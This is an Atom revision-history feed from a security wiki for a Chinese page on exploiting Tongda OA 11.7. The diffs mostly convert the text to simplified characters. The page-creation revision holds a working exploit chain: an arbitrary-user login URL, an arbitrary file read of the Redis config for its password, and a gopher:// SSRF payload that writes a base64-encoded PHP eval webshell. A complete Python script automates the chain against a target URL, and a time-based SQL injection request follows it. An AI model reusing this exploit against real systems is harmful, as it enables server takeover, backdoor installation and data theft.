https://pwnwiki.com/index.php?action=history&feed=atom&title=%E9%80%9A%E9%81%94OA11.7_%E5%88%A9%E7%94%A8%2Fzh-cn
通達OA11.7 利用/zh-cn - Revision history
2026-04-05T09:39:33Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=%E9%80%9A%E9%81%94OA11.7_%E5%88%A9%E7%94%A8/zh-cn&diff=6309&oldid=prev
Xc1ym: Created page with "任意文件读取:"
2021-07-05T08:43:28Z
<p>Created page with "任意文件读取:"</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 08:43, 5 July 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l215" >Line 215:</td>
<td colspan="2" class="diff-lineno">Line 215:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></pre></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></pre></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"><div lang</del>=<del class="diffchange diffchange-inline">"chinese" dir</del>=<del class="diffchange diffchange-inline">"ltr" class="mw-content-ltr"></del></div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>==<ins class="diffchange diffchange-inline">参考</ins>==</div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline">==參考</del>==</div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>https://mp.weixin.qq.com/s/LJRI04VViL4hbt6dbmGHAw</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>https://mp.weixin.qq.com/s/LJRI04VViL4hbt6dbmGHAw</div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del style="font-weight: bold; text-decoration: none;"></div></del></div></td><td colspan="2"> </td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-6307:rev-6309 -->
</table>
Xc1ym
https://pwnwiki.com/index.php?title=%E9%80%9A%E9%81%94OA11.7_%E5%88%A9%E7%94%A8/zh-cn&diff=6307&oldid=prev
Xc1ym: Created page with "如果什么都没有返回,那么就利用当前的phpsessid进行访问。"
2021-07-05T08:42:51Z
<p>Created page with "如果什么都没有返回,那么就利用当前的phpsessid进行访问。"</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 08:42, 5 July 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l12" >Line 12:</td>
<td colspan="2" class="diff-lineno">Line 12:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"><div lang="chinese" dir="ltr" class="mw-content-ltr"></del></div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins class="diffchange diffchange-inline">获取安装目录读取redis配置文件:</ins></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline">獲取安裝目錄讀取redis 配置文件:</del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"></div></del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><pre></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><pre></div></td></tr>
<tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l21" >Line 21:</td>
<td colspan="2" class="diff-lineno">Line 19:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"><div lang="chinese" dir="ltr" class="mw-content-ltr"></del></div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins class="diffchange diffchange-inline">任意文件读取:</ins></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline">任意文件讀取:</del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"></div></del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><pre></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><pre></div></td></tr>
<tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l29" >Line 29:</td>
<td colspan="2" class="diff-lineno">Line 25:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></pre></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></pre></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"><div lang="chinese" dir="ltr" class="mw-content-ltr"></del></div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins class="diffchange diffchange-inline">读取到redis密码。然后通过ssrf:</ins></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline">讀取到redis 密碼。然後通過ssrf:</del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"></div></del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><pre></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><pre></div></td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-6303:rev-6307 -->
</table>
Xc1ym
https://pwnwiki.com/index.php?title=%E9%80%9A%E9%81%94OA11.7_%E5%88%A9%E7%94%A8/zh-cn&diff=6303&oldid=prev
Xc1ym: Created page with "==漏洞利用== 通达OA任意用户登录条件需要管理员在线"
2021-07-05T08:42:07Z
<p>Created page with "==漏洞利用== 通达OA任意用户登录条件需要管理员在线"</p>
<p><b>New page</b></p><div><languages /><br />
==漏洞利用==<br />
通达OA任意用户登录条件需要管理员在线<br />
<br />
<pre><br />
http://192.168.1.22/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0<br />
</pre><br />
<br />
访问路径,覆盖了session直接用cookie登录,访问目录/general/进入后台<br />
<br />
如果什么都没有返回,那么就利用当前的phpsessid进行访问。<br />
<br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
獲取安裝目錄讀取redis 配置文件:<br />
</div><br />
<br />
<pre><br />
/general/approve_center/archive/getTableStruc.php<br />
</pre><br />
<br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
任意文件讀取:<br />
</div><br />
<br />
<pre><br />
/ispirit/im/photo.php?AVATAR_FILE=D:/MYOA/bin/redis.windows.conf&UID=2<br />
</pre><br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
讀取到redis 密碼。然後通過ssrf:<br />
</div><br />
<br />
<pre><br />
/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=gopher://127.0.0.1:6399/<br />
</pre><br />
<br />
==EXP==<br />
<pre><br />
# -*- coding:utf-8 -*-<br />
import os<br />
import requests<br />
import re<br />
# author :print("")<br />
import urllib<br />
<br />
<br />
<br />
<br />
class GenerateUrl:<br />
def __init__(self, password, webroot, filename):<br />
self.password = password<br />
self.webroot = webroot<br />
self.filename = filename<br />
self.webshell = '''<br />
<br />
<?php file_put_contents('11.php',base64_decode('PD9waHAgQGV2YWwoJF9HRVRbMV0pPz4='))?><br />
<br />
<br />
'''<br />
self.template = '''_*2<br />
$4<br />
AUTH<br />
${password_len}<br />
{password}<br />
*1<br />
$8<br />
flushall<br />
*4<br />
$6<br />
CONFIG<br />
$3<br />
SET<br />
$10<br />
dbfilename<br />
${filename_len}<br />
{filename}<br />
*4<br />
$6<br />
CONFIG<br />
$3<br />
SET<br />
$3<br />
dir<br />
${webroot_len}<br />
{webroot}<br />
*3<br />
$3<br />
SET<br />
$1<br />
1<br />
${content_len}<br />
{content}<br />
*1<br />
$4<br />
save<br />
*1<br />
$4<br />
quit<br />
<br />
<br />
'''<br />
def __str__(self):<br />
webshell = self.webshell<br />
webshell = webshell.replace('"', '%22').replace("'", '%27').replace(",", "%2c")<br />
webshell = webshell.replace(' ', '%20').replace('\n', '%0D%0A').replace('<', '%3c').replace('?', '%3f').replace(<br />
'>', '%3e')<br />
self.template = self.template.replace("{password_len}", str(len(self.password)))<br />
self.template = self.template.replace("{password}", self.password)<br />
self.template = self.template.replace("{filename_len}", str(len(self.filename)))<br />
self.template = self.template.replace("{filename}", self.filename)<br />
self.template = self.template.replace("{webroot_len}", str(len(self.webroot)))<br />
self.template = self.template.replace("{webroot}", self.webroot)<br />
self.template = self.template.replace("{content_len}", str(len(self.webshell)))<br />
self.template = self.template.replace("{content}", webshell)<br />
self.template = self.template.replace('\n', '%0D%0A')<br />
return urllib.quote_plus(self.template)<br />
<br />
<br />
proxies = {<br />
"http": "http://127.0.0.1:8080",<br />
"https": "http://127.0.0.1:8080",<br />
}<br />
def headers(phpsesion):<br />
return {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.6) ",<br />
"Cookie": phpsesion<br />
}<br />
<br />
<br />
<br />
# 获取绝对目录<br />
def get_path(url, headers):<br />
urlc = url<br />
url = (url + '/general/approve_center/archive/getTableStruc.php')<br />
try:<br />
data = requests.get(url=url, headers=headers, proxies=proxies).json()<br />
path = data['logPath'].split('\\')[0]<br />
url2 = urlc + '/ispirit/im/photo.php?AVATAR_FILE=%s/bin/redis.windows.conf&UID=2' % path<br />
data2 = requests.get(url=url2, headers=headers, proxies=proxies)<br />
ress = re.search('requirepass .+', data2.text).group()<br />
return {"path": path, "redis_pass": ress.replace('requirepass ', '').strip()}<br />
except:<br />
exit('ERROR Cookie PHPSESSID expired')<br />
<br />
<br />
<br />
<br />
# ssrf写入文件<br />
def ssrf_webshell(url, path, password):<br />
urlc = url<br />
path = path<br />
password = password<br />
a = GenerateUrl(password, path + "/webroot/", "666.php")<br />
url = url + '/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=%s' % ('gopher://127.0.0.1:6399/' + str(a))<br />
data = requests.get(url=url, headers=headers, proxies=proxies)<br />
ddd = requests.get(url=urlc + '/666.php')<br />
if ddd.status_code == 200:<br />
print('shell url:%s' % urlc + '/666.php')<br />
else:<br />
print('send shell ERROR')<br />
return True<br />
<br />
<br />
def get_cookie(url):<br />
url = url+ "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"<br />
headers = {<br />
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",<br />
}<br />
try:<br />
response = requests.get(url=url, headers=headers)<br />
if "RELOGIN" in response.text and response.status_code == 200:<br />
exit("目标用户为离线状态")<br />
elif response.status_code == 200 and response.text == "":<br />
print("好了马上就能getshell了")<br />
cookies = response.cookies<br />
cookie = requests.utils.dict_from_cookiejar(cookies)<br />
if cookie['SESSIONID']:<br />
return cookie['SESSIONID']<br />
else:<br />
exit('实在抱歉,getshell不了')<br />
else:<br />
print("未知错误,目标可能不存在或不存在该漏洞")<br />
except Exception as e:<br />
exit('实在抱歉,getshell不了')<br />
<br />
<br />
if __name__ == '__main__':<br />
import sys<br />
try:<br />
url = sys.argv[1]<br />
cookie =get_cookie(url)<br />
headers = headers(cookie)<br />
root_path = get_path(url, headers)<br />
ssrf_webshell(url, root_path['path'], root_path['redis_pass'])<br />
except:<br />
print('python tongda.py http://127.0.0.1')<br />
</pre><br />
<br />
==SQL==<br />
<pre><br />
POST /general/appbuilder/web/officeproduct/productapply/applyprobygroup HTTP/1.1<br />
Host:<br />
10.211.55.5<br />
Content-Length: 39<br />
Accept: */*<br />
DNT: 1<br />
X-Requested-With: XMLHttpRequest<br />
UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.103 Safar<br />
i/537.36<br />
Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />
Origin:<br />
http://10.211.55.5<br />
Referer:<br />
http://10.211.55.5/general/officeProduct/product_apply/index.php<br />
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8<br />
Cookie: SID_12=530bf0a5; SID_27=7202df24; USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=1plu8qbupnesf40l9d02fdlvm5<br />
; SID_1=24205621<br />
Connection: close<br />
arr[5][pro_id]=151';select sleep(3) %23<br />
</pre><br />
<br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
==參考==<br />
https://mp.weixin.qq.com/s/LJRI04VViL4hbt6dbmGHAw<br />
</div></div>
Xc1ym